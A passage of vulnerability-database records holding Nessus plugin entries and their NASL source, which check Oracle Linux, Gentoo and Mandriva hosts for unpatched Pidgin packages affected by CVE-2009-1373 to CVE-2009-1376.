issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : pidgin (ELSA-2009-1060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:pidgin", "p-cpe:/a:oracle:linux:libpurple-devel", "p-cpe:/a:oracle:linux:finch", "p-cpe:/a:oracle:linux:pidgin-perl", "p-cpe:/a:oracle:linux:libpurple", "p-cpe:/a:oracle:linux:libpurple-tcl", "p-cpe:/a:oracle:linux:finch-devel", "p-cpe:/a:oracle:linux:libpurple-perl", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:pidgin-devel"], "id": "ORACLELINUX_ELSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/nessus/67863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1060 and \n# Oracle Linux Security Advisory ELSA-2009-1060 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67863);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"Oracle Linux 4 : pidgin (ELSA-2009-1060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1060 :\n\nUpdated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-May/001018.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:32", "description": "The remote host is affected by the vulnerability described in GLSA-200905-07\n(Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Pidgin:\n Veracode reported a boundary error in the 'XMPP SOCKS5 bytestream\n server' when initiating an outgoing file transfer (CVE-2009-1373).\n Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol\n handler (CVE-2009-1374).\n A memory corruption flaw in\n 'PurpleCircBuffer' was disclosed by Josef Andrysek\n (CVE-2009-1375).\n The previous fix for CVE-2008-2927 contains a\n cast from uint64 to size_t, possibly leading to an integer overflow\n (CVE-2009-1376, GLSA 200901-13).\n \nImpact :\n\n A remote attacker could send specially crafted messages or files using\n the MSN, XMPP or QQ protocols, possibly resulting in the execution of\n arbitrary code with the privileges of the user running the application,\n or a Denial of Service. NOTE: Successful exploitation might require the\n victim's interaction.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 29, "published": "2009-05-26T00:00:00", "title": "GLSA-200905-07 : Pidgin: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:pidgin"], "id": "GENTOO_GLSA-200905-07.NASL", "href": "https://www.tenable.com/plugins/nessus/38909", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200905-07.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38909);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"GLSA\", value:\"200905-07\");\n\n script_name(english:\"GLSA-200905-07 : Pidgin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200905-07\n(Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Pidgin:\n Veracode reported a boundary error in the 'XMPP SOCKS5 bytestream\n server' when initiating an outgoing file transfer (CVE-2009-1373).\n Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol\n handler (CVE-2009-1374).\n A memory corruption flaw in\n 'PurpleCircBuffer' was disclosed by Josef Andrysek\n (CVE-2009-1375).\n The previous fix for CVE-2008-2927 contains a\n cast from uint64 to size_t, possibly leading to an integer overflow\n (CVE-2009-1376, GLSA 200901-13).\n \nImpact :\n\n A remote attacker could send specially crafted messages or files using\n the MSN, XMPP or QQ protocols, possibly resulting in the execution of\n arbitrary code with the privileges of the user running the application,\n or a Denial of Service. NOTE: Successful exploitation might require the\n victim's interaction.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200901-13\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200905-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pidgin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/pidgin-2.5.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/pidgin\", unaffected:make_list(\"ge 2.5.6\"), vulnerable:make_list(\"lt 2.5.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pidgin\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:52:13", "description": "Security vulnerabilities has been identified and fixed in pidgin :\n\nBuffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n(formerly Gaim) before 2.5.6 allows remote authenticated users to\nexecute arbitrary code via vectors involving an outbound XMPP file\ntransfer. NOTE: some of these details are obtained from third-party\ninformation (CVE-2009-1373).\n\nBuffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\nbefore 2.5.6 allows remote attackers to cause a denial of service\n(application crash) via a QQ packet (CVE-2009-1374).\n\nThe PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n2.5.6 does not properly maintain a certain buffer, which allows remote\nattackers to cause a denial of service (memory corruption and\napplication crash) via vectors involving the (1) XMPP or (2) Sametime\nprotocol (CVE-2009-1375).\n\nMultiple integer overflows in the msn_slplink_process_msg functions in\nthe MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n(2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\nbefore 2.5.6 on 32-bit platforms allow remote attackers to execute\narbitrary code via a malformed SLP message with a crafted offset\nvalue, leading to buffer overflows. NOTE: this issue exists because of\nan incomplete fix for CVE-2008-2927 (CVE-2009-1376).\n\nThis update provides pidgin 2.5.8, which is not vulnerable to these\nissues.", "edition": 25, "published": "2009-07-01T00:00:00", "title": "Mandriva Linux Security Advisory : pidgin (MDVSA-2009:147)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-07-01T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:pidgin-bonjour", "p-cpe:/a:mandriva:linux:lib64finch0", "p-cpe:/a:mandriva:linux:lib64purple0", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:pidgin-tcl", "p-cpe:/a:mandriva:linux:lib64purple-devel", "p-cpe:/a:mandriva:linux:pidgin-mono", "p-cpe:/a:mandriva:linux:pidgin-plugins", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:libpurple0", "p-cpe:/a:mandriva:linux:pidgin", "p-cpe:/a:mandriva:linux:pidgin-client", "p-cpe:/a:mandriva:linux:libfinch0", "p-cpe:/a:mandriva:linux:pidgin-gevolution", "p-cpe:/a:mandriva:linux:finch", "p-cpe:/a:mandriva:linux:pidgin-perl", "p-cpe:/a:mandriva:linux:pidgin-silc", "p-cpe:/a:mandriva:linux:pidgin-meanwhile", "p-cpe:/a:mandriva:linux:libpurple-devel", "p-cpe:/a:mandriva:linux:pidgin-i18n"], "id": "MANDRIVA_MDVSA-2009-147.NASL", "href": "https://www.tenable.com/plugins/nessus/39582", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:147. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39582);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\");\n script_bugtraq_id(35067);\n script_xref(name:\"MDVSA\", value:\"2009:147\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pidgin (MDVSA-2009:147)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security vulnerabilities has been identified and fixed in pidgin :\n\nBuffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n(formerly Gaim) before 2.5.6 allows remote authenticated users to\nexecute arbitrary code via vectors involving an outbound XMPP file\ntransfer. NOTE: some of these details are obtained from third-party\ninformation (CVE-2009-1373).\n\nBuffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\nbefore 2.5.6 allows remote attackers to cause a denial of service\n(application crash) via a QQ packet (CVE-2009-1374).\n\nThe PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n2.5.6 does not properly maintain a certain buffer, which allows remote\nattackers to cause a denial of service (memory corruption and\napplication crash) via vectors involving the (1) XMPP or (2) Sametime\nprotocol (CVE-2009-1375).\n\nMultiple integer overflows in the msn_slplink_process_msg functions in\nthe MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n(2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\nbefore 2.5.6 on 32-bit platforms allow remote attackers to execute\narbitrary code via a malformed SLP message with a crafted offset\nvalue, leading to buffer overflows. NOTE: this issue exists because of\nan incomplete fix for CVE-2008-2927 (CVE-2009-1376).\n\nThis update provides pidgin 2.5.8, which is not vulnerable to these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64finch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfinch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-bonjour\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-gevolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-silc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"finch-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64finch0-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64purple0-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libfinch0-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpurple-devel-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libpurple0-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-bonjour-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-client-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-gevolution-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-i18n-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-meanwhile-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-mono-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-perl-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-plugins-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-silc-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"pidgin-tcl-2.5.8-0.2mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"finch-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64finch0-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64purple0-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libfinch0-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpurple-devel-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpurple0-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-bonjour-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-client-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-gevolution-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-i18n-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-meanwhile-2.5.8-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", 